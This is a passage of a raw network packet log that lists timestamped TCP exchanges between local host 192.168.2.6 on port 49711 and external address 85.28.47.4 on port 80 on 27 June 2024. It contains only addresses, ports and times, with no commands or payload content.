                                                                Jun 27, 2024 05:58:09.646209002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.646220922 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.646226883 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.646231890 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.646236897 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.646243095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.646254063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.646266937 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.646270037 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.646315098 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.646315098 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.646877050 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.646888971 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.646898985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.646909952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.646922112 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.646927118 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.646934032 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.646945000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.646950960 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.646955967 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.646966934 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.646971941 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.646992922 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.647010088 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.647627115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.647640944 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.647651911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.647663116 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.647674084 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.647677898 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.647692919 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.647702932 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.647703886 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.647715092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.647727013 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.647727013 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.647737980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.647747993 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.647752047 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.647773981 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.647787094 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.648411036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.648459911 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.894886017 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.894937992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.894949913 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.894951105 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.894962072 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.895000935 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.895000935 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.895016909 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.895242929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.895255089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.895265102 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.895276070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.895278931 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.895287991 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.895298958 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.895303965 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.895309925 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.895323038 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.895339012 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.895359993 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.895915985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.895927906 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.895941019 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.895951986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.895962954 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.895972967 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.895973921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.895984888 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.895997047 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.896006107 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.896008015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.896024942 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.896044016 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.896626949 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.896639109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.896650076 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.896660089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.896672010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.896682978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.896688938 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.896693945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.896704912 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.896716118 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.896720886 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.896727085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.896732092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.896742105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.896784067 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.896814108 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.897592068 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.897613049 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.897624969 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.897635937 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.897646904 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.897648096 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.897659063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.897670031 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.897680044 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.897686005 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.897691965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.897702932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.897712946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.897713900 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.897722006 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.897723913 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.897733927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.897742033 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.897744894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.897768974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.897792101 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.898554087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.898566008 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.898576975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.898588896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.898600101 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.898606062 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.898611069 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.898622036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.898633957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.898638964 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.898643970 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.898655891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.898660898 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.898665905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.898678064 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.898679972 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.898701906 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.898716927 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.899502039 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.899514914 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.899529934 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.899540901 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.899543047 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.899553061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.899564981 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.899565935 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.899574995 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.899586916 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.899597883 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.899600983 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.899609089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.899619102 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.899620056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.899631023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.899638891 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.899655104 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.899678946 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.900460958 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.900474072 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.900494099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.900506020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.900510073 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.900517941 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.900532961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.900532961 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.900543928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.900556087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.900564909 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.900567055 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.900578976 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.900580883 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.900588989 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.900605917 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.900608063 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.900640011 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.900664091 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.901436090 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.901448011 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.901458979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.901470900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.901483059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.901484966 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.901494980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.901505947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.901511908 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.901516914 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.901529074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.901541948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.901546955 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.901554108 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.901565075 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.901566029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.901586056 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.901602030 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.902117968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902132034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902143002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902158022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902165890 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.902169943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902183056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902183056 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.902194023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902214050 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.902230978 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.902405977 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902442932 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.902602911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902614117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902625084 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902637959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902646065 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.902647972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902658939 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902671099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902672052 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.902682066 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902693033 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902695894 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.902704000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902708054 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.902718067 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902728081 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902731895 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.902741909 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902748108 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.902753115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.902765036 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.902790070 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.903485060 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.903505087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.903517008 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.903527975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.903528929 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.903538942 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.903548956 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.903551102 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.903563023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.903564930 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.903574944 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.903585911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.903595924 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.903598070 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.903606892 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.903618097 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.903624058 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.903629065 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.903637886 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.903640985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.903654099 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.903680086 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.904452085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.904464006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.904475927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.904495955 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.904503107 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.904509068 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.904514074 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.904520988 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.904534101 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.904545069 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.904553890 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.904556036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.904567003 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.904575109 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.904577971 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.904589891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.904592037 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.904601097 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.904612064 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.904618979 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.904645920 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.905333042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.905352116 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.905364990 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.905375957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.905381918 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.905388117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.905400038 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.905405045 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.905411005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.905421972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.905432940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.905436039 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.905452013 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.905458927 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.905462027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.905479908 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.905502081 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.906126976 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.906140089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.906150103 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.906163931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.906174898 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.906181097 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.906187057 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.906198025 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.906208992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.906219959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.906224966 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.906234980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.906245947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.906250000 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.906250954 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.906258106 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.906261921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.906275034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.906286001 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.906312943 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.907001019 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907013893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907025099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907037020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907047987 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907052040 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.907058954 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907071114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907077074 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.907080889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907092094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907094955 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.907103062 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907114029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907125950 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.907125950 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907136917 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907145977 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.907149076 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907174110 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.907191992 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.907918930 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907932043 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907942057 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907953024 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907963991 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907967091 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.907974958 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907984972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907995939 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.907998085 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.908006907 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.908018112 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.908019066 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.908035994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.908046007 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.908054113 CEST804971185.28.47.4192.168.2.6
